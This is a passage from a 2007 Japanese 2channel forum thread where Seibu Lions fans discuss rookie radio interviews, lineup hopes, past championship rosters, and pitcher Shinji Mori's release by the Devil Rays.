・あれ文化放送の企画なんだよ→「そうなんですか?僕バク転できますよ、あははははっ」→じゃあ練習しといてね
・今シーズンの目標は一軍で試合に出ること

132 :代打名無し@実況は実況板で:2007/01/18(木) 21:27:54 ID:XVpzxIoX0
地域密着目指すならコバトンズでいいよ。

133 :代打名無し@実況は実況板で:2007/01/18(木) 21:29:50 ID:SxuAec5/0
>>132
ライオンズは変わらないって

134 :代打名無し@実況は実況板で:2007/01/18(木) 21:32:20 ID:SsDpMFSC0
>>131
大崎おもしろい奴だな、軽く天然か?

135 :代打名無し@実況は実況板で:2007/01/18(木) 21:36:57 ID:5ZgDBY+A0
埼玉と西武合わせて、
西武(さいたけ)ライオンズでいいよ。

136 :代打名無し@実況は実況板で:2007/01/18(木) 21:41:08 ID:VOVueYOO0
>>134
大崎は天然というより頭の回転がよさそうな印象を受けた
一軍に定着できればいいムードメーカーになれそうだ
意外に5分くらいのインタビューでも人柄が伺えて
原は正直に小さい頃は家族ぐるみで巨人ファンだと言っていた
西武は日本シリーズのライバルという認識だったとか
口調もまじめな感じ
岩崎は星野をもう少しはきはきさせた感じで癒しキャラっぽい。お薦め。
山本は自分でアバウトな性格と言っていたが相当気が強いと思う
どの選手もすごく期待が持てるインタビューだった
逆に岸はgdgdだったんだが(口下手か訛りを気にしているか、とにかく話し方の練習や訓練はしたことがないと思う)
なんで西武がよかったの?→「、投手陣の方が、とても素晴らしいので」
QRでは素直に西口さんが好きだと言っても大丈夫だよ・・・と思った

137 :代打名無し@実況は実況板で:2007/01/18(木) 21:59:03 ID:GZVHXS/s0
地域名なんて球場でアンケート取ればいいだけの話だ

138 :代打名無し@実況は実況板で:2007/01/18(木) 22:02:59 ID:wSAsIvtaO
小野寺さん




20日は宇都宮に逝ってみるか

139 :代打名無し@実況は実況板で:2007/01/18(木) 22:06:40 ID:MC5qV/ZHO
大崎は楽しみだな。

140 :代打名無し@実況は実況板で:2007/01/18(木) 22:10:13 ID:RMlkNVmA0
大崎には一番取って欲しいな。
ハムの森本みたいに打って守ってチームを盛り上げてほしい。
原は8番あたりで3割近く打つ嫌らしい選手になってほしい。
1 右 大崎
2 二 片岡
3 DH 栗山
4 左 中島
5 三 中村
6 一 上本(←これはオレの願望)
7 捕 炭谷
8 遊 原
9 中 赤田
近い将来こんな国産生え抜き打線が出来ちゃったりするんだろうか。

141 :代打名無し@実況は実況板で:2007/01/18(木) 22:11:41 ID:bNT3gKBE0
漏れは岩崎のサイドトルネードにwktk
1年目からリリーフで出てきて欲しい
もちろん岸もローテで頑張って欲しいね

142 :代打名無し@実況は実況板で:2007/01/18(木) 22:18:01 ID:Ta84paTh0
>>127
亀レスだが
放送時間を考えるとまだ仕事中の人が多いと思われ

まさか仕事中に聞ける人がそうそういるまい。

143 :代打名無し@実況は実況板で:2007/01/18(木) 22:35:12 ID:5Cz7vYE30
>>142
まあそうだな。
俺はいつもMDコンポに録音して仕事から帰ったら聞いてるけど。

144 :代打名無し@実況は実況板で:2007/01/18(木) 22:38:05 ID:SsDpMFSC0
QRをポッドキャストで配信してくれたらいいのに

145 :代打名無し@実況は実況板で:2007/01/18(木) 22:39:32 ID:5Zh7GM0rO
漏れも遅れた悪い
>>142 漏れは録音だったり生で聞いてるがやはりファンなら聞いた方がいいよ、無理にとはいわんが

146 :代打名無し@実況は実況板で:2007/01/18(木) 22:40:13 ID:bNT3gKBE0
公式の選手名鑑BBS久々に見た
伊東のBBSのとこに変なのがいたw
あと沼に酒飲んでみろって書いたの誰だw

147 :代打名無し@実況は実況板で:2007/01/18(木) 22:42:24 ID:VOVueYOO0
職場で休憩と称してトイレこもってイヤホンで聞いてみたりしているが
ばれたらヤバイだろうなあやっぱ

>>144 球団とQRにメールしてみたことある。黙殺されたw

148 :代打名無し@実況は実況板で:2007/01/18(木) 22:47:28 ID:5Zh7GM0rO
>>144 たしかにポットキャストいいね、ただ元が10分番組だしなぁ…
文化放送自体ポットキャストサービスが充実してないし期待できないね

149 :代打名無し@実況は実況板で:2007/01/18(木) 22:53:33 ID:5Cz7vYE30
ポットキャストなんて無理無理w
需要がライオンズナイターじゃ少なすぎ。
聞く層が若いならいいけど。

150 :代打名無し@実況は実況板で:2007/01/18(木) 23:13:41 ID:9bsj4JC60
ポッドキャスト賛成!みんなでメールだそう!
文化放送は既にポッドキャスト配信してるんだから
やろうと思えばいつでも始められるでしょ。

151 :代打名無し@実況は実況板で:2007/01/18(木) 23:35:18 ID:6njD/9Zs0
>>150
じゃあまずお前は言いだしっぺだから、全部違うアドレスで1000通送れ。
話はそれからだ。

152 :代打名無し@実況は実況板で:2007/01/18(木) 23:36:35 ID:6njD/9Zs0
カリ

153 :代打名無し@実況は実況板で:2007/01/18(木) 23:40:57 ID:uxtDc+El0
公式記録がHの判定でも球団はEの査定で
ナカジ激怒とか

154 :代打名無し@実況は実況板で:2007/01/18(木) 23:42:12 ID:/zt9wm2a0
そう言うプレーになりそうなのが握り直しによる内野安打かな。


155 :代打名無し@実況は実況板で:2007/01/18(木) 23:46:07 ID:A8AxsH6g0
>153
言っちゃ悪いがそういうプレーは何回かあったと記憶している・・・・

156 :代打名無し@実況は実況板で:2007/01/19(金) 00:01:00 ID:nPZpQ7M00
ナカジの記録にならないエラーは何か小手先で誤魔化してるように見える時がある。
どうせなら昔の宇野みたいに派手にやらかしてくれ。
思いきりの良さを無くして小じんまりした選手になってくれるな。

157 :代打名無し@実況は実況板で:2007/01/19(金) 00:05:49 ID:gm+7883r0
あの握り直しは異常
シーズン最後の方の楽天戦?でアウトに出来なかったのは絶望した

でもショートは中島(`・ω・´)

158 :代打名無し@実況は実況板で:2007/01/19(金) 00:08:31 ID:maK1eRoq0
2番手選手は一番ショートが薄いね。

159 :代打名無し@実況は実況板で:2007/01/19(金) 00:11:13 ID:CN7xSDiR0
北京五輪は1001で決定したんだな。松坂は出れないんだろうなぁ

160 :代打名無し@実況は実況板で:2007/01/19(金) 00:11:19 ID:Lf88Jdrx0
黒田のショートはどうなんだろ

161 :代打名無し@実況は実況板で:2007/01/19(金) 00:11:28 ID:aE7HeXIz0
>>156
>どうせなら昔の宇野みたいに派手にやらかしてくれ

凡フライでヘディングかまして姉貴激怒とか

162 :代打名無し@実況は実況板で:2007/01/19(金) 00:12:16 ID:l8/AFerZ0
ノリスレ立ってたか

163 :代打名無し@実況は実況板で:2007/01/19(金) 00:13:09 ID:Z022ptgWP
>>123
彩の国西武ライオンズ

が限界かな。
多摩地区ファンとしては。

164 :代打名無し@実況は実況板で:2007/01/19(金) 00:27:24 ID:KlRgC7Zg0
球団が埼玉への密着を考えているのなら
武蔵野はないだろう。
個人的には武蔵野で東京のファンも獲得して欲しいが。

165 :代打名無し@実況は実況板で:2007/01/19(金) 00:28:13 ID:gm+7883r0
>>160
実は結構期待してたり
守備は無難にこなすし、足も悪くない
代打でHR打ったりパワーも意外にある



あとはバットに当たるかだ
どっかの27みたいだが

166 :代打名無し@実況は実況板で:2007/01/19(金) 00:36:04 ID:8vGOWN600
>>165
そこでばすt(ry

167 :代打名無し@実況は実況板で:2007/01/19(金) 00:40:53 ID:gm+7883r0
>>166
あの長身でバスt(ryはつらそうだw

土井御大の指導でどうにかならないものか

168 :代打名無し@実況は実況板で:2007/01/19(金) 00:42:06 ID:Llt8/1wG0
>>167
土井さんより田辺の方が実績あるきがする

169 :代打名無し@実況は実況板で:2007/01/19(金) 00:44:13 ID:gm+7883r0
kwsk
正直どっちが誰を育てたのか覚えてなす

170 :代打名無し@実況は実況板で:2007/01/19(金) 00:52:33 ID:f6XKSno1O
中島のショートは良くも悪くも魅力的だし好きだなぁ
欲を言えばうまくなって欲しいが、走って打てれば文句ないよ、漏れは

171 :代打名無し@実況は実況板で:2007/01/19(金) 01:09:45 ID:++sr+/iR0
中島、栗山、中村の功績は
スカウト>田辺>おじいちゃん

172 :代打名無し@実況は実況板で:2007/01/19(金) 01:15:04 ID:gm+7883r0
>>171
いいコト起こりそうなIDですね

173 :代打名無し@実況は実況板で:2007/01/19(金) 01:16:48 ID:f6XKSno1O
>>171 そりゃあスカウトは素晴らしいし田辺さんもすごい、ただ土井さんのファンである漏れとしては稼頭央育てたのも土井さんだしやっぱ存在はでかいんじゃない?

174 :代打名無し@実況は実況板で:2007/01/19(金) 01:21:25 ID:mNG+0nKT0
彩武ライオンズ

175 :代打名無し@実況は実況板で:2007/01/19(金) 01:26:50 ID:hD7SRhiUO
>>168
さすがに実績は土井御大だろ

>>173
稼頭央は現場ではおじいちゃんだが、西武という組織だな
聞いた話だから真相はわからないが、稼頭央を育てる為にすごかったらしい
おじいちゃんといえば清原ってイメージだな

176 :代打名無し@実況は実況板で:2007/01/19(金) 01:29:02 ID:gm+7883r0
内角球云々の話はにわか上がりの俺でも聞いたことがあるなぁ

中島にはちゃんと教えてくれたのだろうか

177 :代打名無し@実況は実況板で:2007/01/19(金) 01:59:53 ID:UNYW4+Ob0
あの投手を育てたのは荒木だ。
ナベQの実績はすごいぞ。

とか投手でも同じような話がしたいもんだ。

178 :代打名無し@実況は実況板で:2007/01/19(金) 02:02:09 ID:Lf88Jdrx0
今年のブレイク期待度 
A 中村、栗山、松永
B 山崎、西川、宮越、山岸
C 山本歩、山本淳、岩崎、炭谷、大崎、原、水田、GG、上本、高山
D 東、岡本


大穴 大沼、後藤武

179 :代打名無し@実況は実況板で:2007/01/19(金) 02:04:34 ID:9ekPxS9D0
岸はダメか

180 :代打名無し@実況は実況板で:2007/01/19(金) 02:07:53 ID:Aaz/0Uc70
もはや他球団の話だけど、鈴木健がキャンプ2軍スタートみたい。
ちょっと寂しい…。
神宮に俺が見に行くとよく健さんが打ってくれたな。



181 :代打名無し@実況は実況板で:2007/01/19(金) 02:08:22 ID:Lf88Jdrx0
>>179
肝心なの忘れてたorz
もちろんAで

182 :代打名無し@実況は実況板で:2007/01/19(金) 02:15:58 ID:UNYW4+Ob0
鈴木健って何でこうも伸び悩んだんだろうな。
大成みたいに怪我ばっかりしてたわけでもないのに。

183 :代打名無し@実況は実況板で:2007/01/19(金) 02:21:58 ID:Aaz/0Uc70
>>182
伸び悩んだというのかなあ? 俺としては貧打ライオンズ時代の
主軸にあって、非常に良くやっていたという印象。チャンスに凡退も
多くて頭きたこともあったけど、ずっと好きだった。ヤクルトに
移籍してからも活躍してた。健さん見たさに仕事帰り、神宮に
よく行ったよ。

184 :代打名無し@実況は実況板で:2007/01/19(金) 02:25:20 ID:GeuK64gK0
>>182
中距離打者なのに、長距離打者として期待されたからでは。
マルティネスを斬った後は、鈴木健だけがマークされる羽目になったし。

185 :代打名無し@実況は実況板で:2007/01/19(金) 02:28:15 ID:Lf88Jdrx0
97年の優勝決定ホームランは鮮明に覚えてるわ…
確か吉武からだったよな

186 :代打名無し@実況は実況板で:2007/01/19(金) 02:48:40 ID:Aaz/0Uc70
>>185
ナツカシス…。
移籍していった中ではかなり幸せな選手人生を送った人だと思う。



187 :代打名無し@実況は実況板で:2007/01/19(金) 02:49:48 ID:f6XKSno1O
しかし97、98の優勝メンバーは捕手伊東、一塁大成、二塁浩之、三塁鈴木健、遊撃稼頭央、外野大友、佐々木、小関
でうちに残ったのは監督、フロントで現役は浩之だけでみんなよそに出てっちゃったなぁ…投手は豊田以外は思いつかないけど

188 :代打名無し@実況は実況板で:2007/01/19(金) 02:56:42 ID:HohevX0hO
>>177
あの投手(大沼)を育てたのは荒木だ

いやなべQの実績(長田)もすごいぞ
あ、あれ?

189 :代打名無し@実況は実況板で:2007/01/19(金) 02:58:29 ID:JWzxXIY6O
>>187
乙は?

190 :代打名無し@実況は実況板で:2007/01/19(金) 03:01:33 ID:GIeaqKtf0
潮崎も入れてあげてください

191 :代打名無し@実況は実況板で:2007/01/19(金) 03:02:07 ID:9ekPxS9D0
熟読せよ

192 :代打名無し@実況は実況板で:2007/01/19(金) 03:14:53 ID:GeuK64gK0
>>187
石井貴

193 :代打名無し@実況は実況板で:2007/01/19(金) 03:16:43 ID:JWzxXIY6O
あと在籍してたのが貴と田原?くらいだた
10年って長いな…

194 :代打名無し@実況は実況板で:2007/01/19(金) 03:23:22 ID:f6XKSno1O
>>187 書き方がわるかったな失礼、出て行ったのが投手では豊田以外思い付かないなって
まぁ森は外国だからなぁ〜
それにしても99〜00のオーダーは無惨だな…外国人が酷すぎるなw
色々調べたらオーダーがコロコロ変わるね、面白いのがセカンド
コロコロ変わるわりになかなか毎年最初は使わない浩之が最後はレギュラーになってるw古屋も原井も玉野もダメだったな結局…本当は黒田もいるがまだまだやってくれるはず

195 :代打名無し@実況は実況板で:2007/01/19(金) 03:56:24 ID:el0znLSb0
http://www.youtube.com/watch?v=JTQFci21ELs

196 :代打名無し@実況は実況板で:2007/01/19(金) 03:57:46 ID:el0znLSb0
http://www.youtube.com/watch?v=5qw9o07RTHQ

197 :代打名無し@実況は実況板で:2007/01/19(金) 06:57:15 ID:QdMzIa5m0
>>102
野球以外では
そっくりなお兄さんとK−1観戦。
テレビで観てた赤田に結果教える。
赤田家では試合よりも会場の細川探す事に盛り上がる。

198 :代打名無し@実況は実況板で:2007/01/19(金) 07:16:36 ID:naHSImAm0
>>197
弟じゃなかったか?

199 :代打名無し@実況は実況板で:2007/01/19(金) 10:07:43 ID:nsVk7eNs0
弟だっけ?

200 :代打名無し@実況は実況板で:2007/01/19(金) 10:12:49 ID:/B2hqNOvO
【みちのくの】西武・岸孝之応援スレ【プリンス】
http://ex13.2ch.net/test/read.cgi/base/1169168466/

板がおかしいうちにどさくさに紛れて立てました

201 :代打名無し@実況は実況板で:2007/01/19(金) 10:36:22 ID:+Zyx9ZLY0
読売新聞で片岡特集してた

202 :代打名無し@実況は実況板で:2007/01/19(金) 11:59:23 ID:sHmcrKnFO
おい、おまいら!
今年の剛也は30本打つぜって彼女が言ってたから安心汁!

203 :代打名無し@実況は実況板で:2007/01/19(金) 12:20:04 ID:j3oiIaSj0
中島の守備出来高契約って、積極的にボールに触りにいこうとしなかったらエラー率が下がって給料アップか。

204 :代打名無し@実況は実況板で:2007/01/19(金) 12:26:31 ID:mflV9rrC0
彼女自慢なら間に合ってます

205 :代打名無し@実況は実況板で:2007/01/19(金) 12:42:06 ID:rVX487fY0
>>203
そんなみみっちい事考えるタイプだとは思えんが。。。
(いい意味で)頭良くなさそうだし、打球飛んで来たら猫のように飛びついていくさ。

206 :代打名無し@実況は実況板で:2007/01/19(金) 12:57:14 ID:oaytO1nX0
>>203
そんなことしてたら伊東にしばかれる

207 :代打名無し@実況は実況板で:2007/01/19(金) 13:06:39 ID:cz2xiqKf0
こきげんように帆足が

208 :代打名無し@実況は実況板で:2007/01/19(金) 14:36:22 ID:UDWwZdfH0
10年後も
「07年の優勝時から残ってるのは涌井と大沼ぐらいか。でも若くて10年後が楽しみなチームだね」
とか言ってる気がする

209 :代打名無し@実況は実況板で:2007/01/19(金) 16:03:45 ID:sHmcrKnFO
大沼沢村賞おめでとう!

210 :代打名無し@実況は実況板で:2007/01/19(金) 16:34:57 ID:NSHTT4fuO
レス伸びないな。じゃここで一つ先発ローテーションの予想を。西口‐松永‐JJ‐涌井‐帆足‐ギッセル。

211 :代打名無し@実況は実況板で:2007/01/19(金) 16:42:23 ID:iptCDM6GO
>>210 前にも言ったが、開幕の日程は2連戦→休み→2連戦→休みとゆるゆる日程だからギッセルは使わないでしょ…
後、普通に涌井は開幕だと思う

212 :代打名無し@実況は実況板で:2007/01/19(金) 16:50:08 ID:sHmcrKnFO
カブレラ三冠王おめでとう!


213 :代打名無し@実況は実況板で:2007/01/19(金) 17:44:24 ID:ldP2Wtur0
今年のシーズンで若手のピッチャー(ルーキーは除く)が台頭してこないと
下のコーチ陣が変わりそうな気も…

214 :代打名無し@実況は実況板で:2007/01/19(金) 18:01:20 ID:sHmcrKnFO
福地盗塁王おめでとう!

それにしても過疎ってるな・・・・。

215 :代打名無し@実況は実況板で:2007/01/19(金) 18:05:45 ID:hqHsovRUO
本日のQRは木村和

・寮のご飯がおいしくて3日で体重2キロ増えた
・食べるのが好きだから、どんどん食べて体を大きくしたい
・短距離は得意だが、長距離は苦手。自分の短所
・やらされる練習ではなく、自分から取り組む
・先輩はみんなよくしてくれる
・まわりはみんな先輩だが、みんなライバル。プライベートでは先輩関係を大事にし、グラウンドでは関係なくどんどんいきたい
・早くユニフォームが着たい。そこでさらにライオンズの一員という心構えが強くなる
・高校時代は怪我が多かったから体を強くしたい

前田スカウト曰くキャンプA班もありうると

聴きながらバーッとやったから分かりにくかったらスマソ

とくに緊張した感じもなく、しっかりと話せてた
とにかく寮のご飯がおいしくてお気に入りらしい
怪我なく大きな選手に育ってくれ

216 :代打名無し@実況は実況板で:2007/01/19(金) 18:08:11 ID:0RToI4f+O
森慎解雇だってよ

217 :代打名無し@実況は実況板で:2007/01/19(金) 18:08:37 ID:sHmcrKnFO
>>215
和田しく西口

218 :代打名無し@実況は実況板で:2007/01/19(金) 18:09:57 ID:sHmcrKnFO
>>216
つ、釣られないぞ
ソースだせ

219 :代打名無し@実況は実況板で:2007/01/19(金) 18:10:08 ID:VL3Vn2Ed0
森・・・戻って来い

220 :代打名無し@実況は実況板で:2007/01/19(金) 18:11:00 ID:iptCDM6GO
>>215乙、漏れも聞いてたが木村には是非A班に入れるくらい頑張ってほしいね
>>216 ( ̄□ ̄;)マジ!?日本に帰ってきたりするのか?できればソースヨロ

221 :代打名無し@実況は実況板で:2007/01/19(金) 18:15:07 ID:kvSEg9CX0
帰国するなら絶対に帰ってきて欲しい

222 :代打名無し@実況は実況板で:2007/01/19(金) 18:16:35 ID:sHmcrKnFO
芸スポでみたらほんとだった・・・。
100キロくらいしかでないんだって・・・。
(´・ω・`)・・・・
(´;ω;`)ブワッ

223 :代打名無し@実況は実況板で:2007/01/19(金) 18:16:42 ID:M5K4i+BF0
森もどってこい!

224 :代打名無し@実況は実況板で:2007/01/19(金) 18:19:18 ID:bLe7Jvoy0
ttp://www.major.jp/news/news20070119-19450.html
これか
しかし1度も投げずに解雇とはな・・・・
日本に帰ってくるのかな?


225 :代打名無し@実況は実況板で:2007/01/19(金) 18:19:30 ID:Ea6VLKao0
ttp://www.major.jp/news/news20070119-19450.html
地元紙報道

226 :代打名無し@実況は実況板で:2007/01/19(金) 18:20:13 ID:1Vu/gu420
いや普通に戻らなくていいよ・・・

227 :代打名無し@実況は実況板で:2007/01/19(金) 18:20:55 ID:Ea6VLKao0
被ってごめん、今年のレオレオ詐欺はこれか?

228 :代打名無し@実況は実況板で:2007/01/19(金) 18:22:49 ID:sHmcrKnFO
帰ってこなくていいって奴はなんなの?
死ねばいいのに
確かに戦力にはならないかもしれんが復活するかもしんないだろ


229 :代打名無し@実況は実況板で:2007/01/19(金) 18:23:15 ID:+kxPx3Rl0
http://www.major.jp/news/news20070109-19322.html
(昨秋の)帰国前は球速が100キロだった。

元の森なら欲しい気もするけど、この森はちょっと・・・・

230 :代打名無し@実況は実況板で:2007/01/19(金) 18:30:59 ID:iptCDM6GO
急展開だなぁ…でもタダじゃ帰りたくないだろうが、中継ぎ足りないしましてや森なら大歓迎だけどなぁ
まだ若いし是非来てほしいけど、05の時みたいな 先発やらせたりとか負担はかけられないな

231 :代打名無し@実況は実況板で:2007/01/19(金) 18:31:59 ID:/B2hqNOvO
もともと全治二年とかって診断じゃなかったか?

232 :代打名無し@実況は実況板で:2007/01/19(金) 18:32:52 ID:j3oiIaSj0
【野球】オリ中村、ラグビー大畑に相談していた 日刊スポーツ
       ↓
       ↓
       ↓
【ラグビー】神戸製鋼の大畑大介、右脚アキレス腱を断裂[01/15]
http://news21.2ch.net/test/read.cgi/mnewsplus/1168875908/



【野球】デビルレイズ・森慎二投手が西武・大沼と所沢の西武球団施設で自主トレ
http://news21.2ch.net/test/read.cgi/mnewsplus/1168335952/
       ↓
       ↓
       ↓
【MLB】タンパベイ・デビルレイズが森慎二投手を解雇 地元紙が報じる
http://news21.2ch.net/test/read.cgi/mnewsplus/1169196796/

233 :代打名無し@実況は実況板で:2007/01/19(金) 18:35:35 ID:XA3HfDnx0
森のニュースを探しに行ったらレッズの新ユニで吹いたw


森さんはうちでゆっくりリハビリしてほすぃ

234 :代打名無し@実況は実況板で:2007/01/19(金) 18:37:29 ID:9gX2L7qS0
この時期に解雇ということは余程肩が悪いんだろう。復活は無理と判断したんじゃないか?
2、3000万でなら獲ってもいいと思うが、高いか・・・。育成契約とか?

235 :代打名無し@実況は実況板で:2007/01/19(金) 18:42:49 ID:sHmcrKnFO
どうか神様森慎二の肩をなおしてあげてくださいお願いします(ー人ー)
伊藤智仁にはならないで

236 :代打名無し@実況は実況板で:2007/01/19(金) 18:43:53 ID:XA3HfDnx0
>>234
SBの永井の様に球団職員として獲って復活を待つ方法もある



今、永井が何をやってるかはわからんけど・・・

237 :代打名無し@実況は実況板で:2007/01/19(金) 18:44:40 ID:opxTjh5+0
もう1年ぐらいリハビリ必要だろうな
1000万ぐらいで雇ってくれ

238 :代打名無し@実況は実況板で:2007/01/19(金) 18:45:21 ID:bLe7Jvoy0
日本に帰るなら欲しいけどな。
ただFAまですぐだったから、投げられるようになったら
またFAでメジャーに行くだろうし、難しい選手ではあるな。


239 :代打名無し@実況は実況板で:2007/01/19(金) 18:56:43 ID:uNbvNbf+0
>>237
治るまで育成選手枠でいい

240 :代打名無し@実況は実況板で:2007/01/19(金) 18:58:10 ID:sHmcrKnFO
だからといって見捨てることはしたくない・・・。
復活を信じてるとかいいようがない
いやなニュースきいちまったな

241 :代打名無し@実況は実況板で:2007/01/19(金) 19:04:36 ID:hqHsovRUO
せっかくずっと行きたがってたメジャーに行って、これじゃあまりにも森がかわいそうすぎる
しっかりリハビリしてライオンズで復活してほしい
帰ってこい

242 :代打名無し@実況は実況板で:2007/01/19(金) 19:07:26 ID:uNbvNbf+0
故障から4年のブランクの後で復活した荒木大輔の例もあるから簡単には見捨てたくない
ただライオンズがそこまでガマンして面倒を見ることが出来るかどうか

243 :代打名無し@実況は実況板で:2007/01/19(金) 19:18:10 ID:P72iJfgF0
シンジ・・・悲惨だな・・・・
東尾や伊原に酷使されたせいで・・・・・・・・

244 :代打名無し@実況は実況板で:2007/01/19(金) 19:20:17 ID:G6vY1Taf0
リリーフでは使い物にならないと考えられたんだろう

先発 中6日限定で復活したら
斉藤和巳みたいになるかもしれん

245 :代打名無し@実況は実況板で:2007/01/19(金) 19:27:46 ID:P72iJfgF0
もし西武に帰ってきても小野寺とタイプ被るからな
先発で行くしかないな

246 :代打名無し@実況は実況板で:2007/01/19(金) 19:29:16 ID:uNbvNbf+0
>>244
球数限定登板の予感

247 :代打名無し@実況は実況板で:2007/01/19(金) 19:31:52 ID:sHmcrKnFO
中継ぎは?復活したらの話だけどさ

248 :代打名無し@実況は実況板で:2007/01/19(金) 19:32:14 ID:1Vu/gu420
「オリ、ラロッカ獲得」
http://www.sponichi.co.jp/baseball/flash/KFullFlash20070119059.html

さ〜てどうすんべや

249 :代打名無し@実況は実況板で:2007/01/19(金) 19:33:21 ID:G6vY1Taf0
>>247
毎試合肩作らなきゃだからな

250 :代打名無し@実況は実況板で:2007/01/19(金) 19:34:55 ID:P72iJfgF0
うちにはJJがいるじゃないか!あとはノリ獲れば最高の補強

251 :代打名無し@実況は実況板で:2007/01/19(金) 19:35:19 ID:uNbvNbf+0
>>247
故障上がりで毎試合ベンチ入りしてブルペンで肩作ってってキツくない?

252 :代打名無し@実況は実況板で:2007/01/19(金) 19:36:30 ID:+0hLrEdA0
>>248
多分パリーグじゃそんなにホームランは出ないと思われ
三割はほぼ確実だろうけど

253 :代打名無し@実況は実況板で:2007/01/19(金) 19:37:08 ID:/B2hqNOvO
若手の手本として年俸2000万くらいなら

254 :代打名無し@実況は実況板で:2007/01/19(金) 19:40:37 ID:EiNlN0Uq0
手本にされたら困ります!

255 :代打名無し@実況は実況板で:2007/01/19(金) 19:40:48 ID:/B2hqNOvO
ラッカルは広島、ヤクルトと狭い球場が本拠地のチームでプレーしてたし、パに来れば15本前後だろ
しかもA級スペランカーだし

256 :代打名無し@実況は実況板で:2007/01/19(金) 19:42:29 ID:r3DqIwxpO
慎二かわいそすぎる(´;ω;`)

257 :代打名無し@実況は実況板で:2007/01/19(金) 19:43:57 ID:W4fDsC4N0
昔、広島→ダイエーに入ったロペスも広島では30本打ってたけど
ダイエーでは15本止まりだったからな

258 :代打名無し@実況は実況板で:2007/01/19(金) 19:44:00 ID:uNbvNbf+0
>>248
ラロッカは打つだろうけどオリックスの戦いぶりはさほど変わらない
オリックスはラロッカが3割15本塁打ぐらい打っても5位だろう

259 :代打名無し@実況は実況板で:2007/01/19(金) 19:45:07 ID:P72iJfgF0
今年はSBとロッテで1位争いだな
西武は3位に滑り込めればいい

260 :代打名無し@実況は実況板で:2007/01/19(金) 19:45:52 ID:cXWYoCqg0
工作員うざっ。

261 :代打名無し@実況は実況板で:2007/01/19(金) 19:59:35 ID:sHmcrKnFO
>>249
>>251
そういうことかサンクス

262 :代打名無し@実況は実況板で:2007/01/19(金) 20:03:45 ID:yXMQBqrZ0
森も波乱の人生だな・・・

263 :代打名無し@実況は実況板で:2007/01/19(金) 20:06:22 ID:dH6cOygd0
意外に同情的な意見が多いな。
逆指名で入ってきたくせに、毎年メジャー行きたいメジャー行きたいごねて
挙句ポスティングって馬鹿かと思ってたから
あまりいい感情は持ってない。

264 :代打名無し@実況は実況板で:2007/01/19(金) 20:09:30 ID:G6vY1Taf0
森のポスティングで100万ドルもらったよな?
とりあえず森の帰る場所だけは確保してやりたい

265 :代打名無し@実況は実況板で:2007/01/19(金) 20:11:53 ID:mP3rO3SM0
最後の年とかうっとーしそうに投げてるときもあったから、
もうしゃーないね行けてよかったねと思っていたが

森慎戻ってくるなら雇ってあげてほしいなあ
11はもう岸が貰っちゃったから、110の王ってことでどうよ
復活したらまたいい番号つければいいし

266 :代打名無し@実況は実況板で:2007/01/19(金) 20:14:45 ID:G6vY1Taf0
背番号は440で

267 :代打名無し@実況は実況板で:2007/01/19(金) 20:16:22 ID:W4fDsC4N0
背番号2億5000万円でいいんじゃないか

268 :代打名無し@実況は実況板で:2007/01/19(金) 20:21:28 ID:wA1jPbQwO
>>266
清原亡きあとの山田と四番争いするのか

269 :代打名無し@実況は実況板で:2007/01/19(金) 20:23:15 ID:uNbvNbf+0
>>266
ししまるw

270 :代打名無し@実況は実況板で:2007/01/19(金) 20:32:34 ID:XA3HfDnx0
>>269
あんな感じのセットアップがほすぃw
いま中継ぎやってるかは知らんが

271 :携帯牛島 ◆ztOPJ4tvQw :2007/01/19(金) 20:34:17 ID:WeRsusarO
メジャーでバッタバタ三振取る慎二見たかったな…。

272 :代打名無し@実況は実況板で:2007/01/19(金) 20:37:15 ID:v/5UEyq90
森、デニー、杉山、橋本、竹下…
あの頃のリリーフ陣なかなか良かったよな…

273 :代打名無し@実況は実況板で:2007/01/19(金) 20:40:45 ID:EiNlN0Uq0
あの頃は、デニーがあそこまでのネタキャラになるとは思わなかった。

274 :代打名無し@実況は実況板で:2007/01/19(金) 20:41:24 ID:uNbvNbf+0
橋本は小さいけど良かったな

275 :代打名無し@実況は実況板で:2007/01/19(金) 20:47:12 ID:r3DqIwxpO
やっぱりトンビの力が必要だよな…

276 :代打名無し@実況は実況板で:2007/01/19(金) 20:47:23 ID:brmxyXp+0
森、獲ってもいいんじゃないかな。
完全復活して開幕からいけるようなら大きな戦力だし、終盤にやっと調子を戻して10試合くらいリリーフしてくれるだけでも大分助かる。
復調しなけりゃしないで最初から計算に入ってないんだから損はない。

277 :代打名無し@実況は実況板で:2007/01/19(金) 20:54:58 ID:+kxPx3Rl0
確かに去年は、豊田移籍より森移籍の方が痛かったんだよな。

278 :代打名無し@実況は実況板で:2007/01/19(金) 20:55:53 ID:uNbvNbf+0
豊田はすでに下り坂だったからな

279 :代打名無し@実況は実況板で:2007/01/19(金) 21:01:02 ID:brmxyXp+0
下り坂はどっちもだったけど、まあ、試合数をこなしてくれるありがたさは森のほうが上だったなあ、確かに。

280 :代打名無し@実況は実況板で:2007/01/19(金) 21:06:52 ID:+kxPx3Rl0
>>276
文頭の「も」を「の」に代えても、おおむね意味が通るから恐いよな。

281 :代打名無し@実況は実況板で:2007/01/19(金) 21:07:24 ID:4sKyPtN+0
いっそのことヤンキースあたりが獲得しないだろうか。
ブルペンが手薄な印象があるし。(今季に向けての補強は把握していないが。)

282 :代打名無し@実況は実況板で:2007/01/19(金) 21:10:52 ID:bLe7Jvoy0
一昨年は防御率は兎も角内容は森は良かったしね。
打たれたのって殆ど差のついたゲームばっかりだったし。
逆に豊田は2年前の0点台、一昨年は森よりも防御率は良かったけど内容は防御率ほどは良くなかった。



283 :代打名無し@実況は実況板で:2007/01/19(金) 21:12:00 ID:hqHsovRUO
森を今季の戦力として考えるのは無理じゃないか?
今年一年はリハビリでしょ

284 :代打名無し@実況は実況板で:2007/01/19(金) 21:12:11 ID:dH6cOygd0
ノリは揉め事起こすからいらんって散々言ってたのに、元身内になるとこれかい。
あれだけごねて出て行った奴をまた応援する気によくなるな。

285 :代打名無し@実況は実況板で:2007/01/19(金) 21:14:53 ID:EiNlN0Uq0
サードはこれ以上(゚听)イラネ
中継ぎは喉から手が出る程欲しい。
つまりはそういうこと。

286 :代打名無し@実況は実況板で:2007/01/19(金) 21:17:23 ID:uNbvNbf+0
サードと違って投手はいくらいてもいいんだよ

287 :代打名無し@実況は実況板で:2007/01/19(金) 21:17:43 ID:ScnAy49V0
ノリはいらんよ普通に

288 :代打名無し@実況は実況板で:2007/01/19(金) 21:22:09 ID:DaHdpG3F0
>>276
本院が日本に戻ると発言したわけじゃないからないだろ。
多分マイナーでもいいから向こうでやるよ。
森はそういう選手。

289 :代打名無し@実況は実況板で:2007/01/19(金) 21:22:12 ID:bQwQ38Gp0
